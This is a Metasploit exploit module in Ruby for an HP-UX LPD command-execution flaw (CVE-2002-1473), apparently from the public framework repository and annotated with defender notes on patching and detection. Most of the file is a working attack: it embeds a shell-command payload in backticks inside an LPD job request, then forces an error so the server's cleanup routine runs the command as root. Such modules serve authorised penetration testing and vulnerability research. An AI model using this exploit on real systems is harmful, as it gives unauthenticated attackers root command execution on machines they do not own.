GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/hpux/lpd/cleanup_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2002-1473 (OSVDB 9638): unauthenticated
# command execution as root via the HP-UX LPD service (TCP port 515). Per the
# description below, the flaw was fixed together with the buffer overflows in
# HP Security Bulletin HPSBUX0208-213, and exploitation requires that the
# target can resolve the attacking host's address.
#
# Defender notes, derived from the exchange implemented in #exploit:
#   - Mitigation: apply HPSBUX0208-213 and restrict port 515 to trusted print
#     clients; the module needs nothing but TCP access to RPORT.
#   - Detection: a receive-job request (leading 0x02 byte) whose request line
#     contains backtick characters, followed by a ~16 KiB random alphanumeric
#     blob and an abrupt disconnect, is the on-the-wire footprint of this
#     technique.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (name, description, references, payload
  # constraints, targets) and the single RPORT option (default 515).
  #
  # @param info [Hash] metadata overrides merged in by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'HP-UX LPD Command Execution',
      'Description' => %q{
        This exploit abuses an unpublished vulnerability in the
        HP-UX LPD service. This flaw allows an unauthenticated
        attacker to execute arbitrary commands with the privileges
        of the root user. The LPD service is only exploitable when
        the address of the attacking system can be resolved by the
        target. This vulnerability was silently patched with the
        buffer overflow flaws addressed in HP Security Bulletin
        HPSBUX0208-213.
      },
      'Author' => [ 'hdm' ],
      'References' =>
        [
          [ 'CVE', '2002-1473'],
          [ 'OSVDB', '9638'],
          [ 'URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],

        ],
      'Platform' => %w{ hpux unix },
      # Command payloads only (no binary shellcode): the payload is a shell
      # command string spliced into the request line in #exploit.
      'Arch' => ARCH_CMD,
      'Payload' =>
        {
          # At most 200 bytes; the encoded command must not contain NUL, tab,
          # space or '/', since it is embedded in a single request line.
          'Space' => 200,
          'DisableNops' => true,
          'BadChars' => "\x00\x09\x20\x2f",
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets' =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2002-08-28'
    ))

    register_options(
      [
        Opt::RPORT(515)
      ])
  end

  # Drives the LPD exchange against RPORT:
  #   1. announce a print job whose request line embeds the encoded payload
  #      in backticks,
  #   2. send a short control-file header,
  #   3. write an oversized random body and drop the connection, which the
  #      original author describes as forcing an error so that the server's
  #      cleanup routine processes the injected string.
  # Each step is acknowledged by a single 0x00 byte from the server; a missing
  # ACK prints a status line and returns without raising.
  def exploit

    # Job ID: the process id reduced modulo 1000 (so at most three decimal
    # digits), followed by the current epoch seconds rendered as 8 hex
    # characters (big-endian 32-bit).
    jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

    # Connect to the LPD service (RPORT, default 515)
    connect

    print_status("Sending our job request with embedded command string...")
    # Request line: 0x02 (LPD "receive job" command, RFC 1179 style), three
    # random alphanumerics, the job ID, then the encoded payload wrapped in
    # backticks and terminated by a newline.
    sock.put(
      "\x02" + rand_text_alphanumeric(3) + jid +
      "`" + payload.encoded + "`\n"
    )

    # Read one byte; anything other than 0x00 (or no data) means the job was
    # refused and the module gives up without raising.
    res = sock.get_once(1)
    if !(res and res[0,1] == "\x00")
      print_status("The target did not accept our job request")
      return
    end

    print_status("Sending our fake control file...")
    # Control-file sub-command: the literal "\x02 32 cfA" prefix plus 8 random
    # alphanumerics as the file name. NOTE(review): the "32" is presumably the
    # announced control-file length in RFC 1179 terms — confirm; the bytes
    # actually written next are the random body below, not a 32-byte file.
    sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
    res = sock.get_once(1)
    if !(res and res[0,1] == "\x00")
      print_status("The target did not accept our control file")
      return
    end

    print_status("Forcing an error and hijacking the cleanup routine...")

    # 16 KiB of random alphanumerics followed by an immediate disconnect. The
    # bare rescue catches StandardError (e.g. the peer closing the socket
    # mid-write); errors here are expected and deliberately ignored, since the
    # point of this step is to make the server take its error path.
    begin
      sock.put(rand_text_alphanumeric(16384))
      disconnect
    rescue
    end

  end
end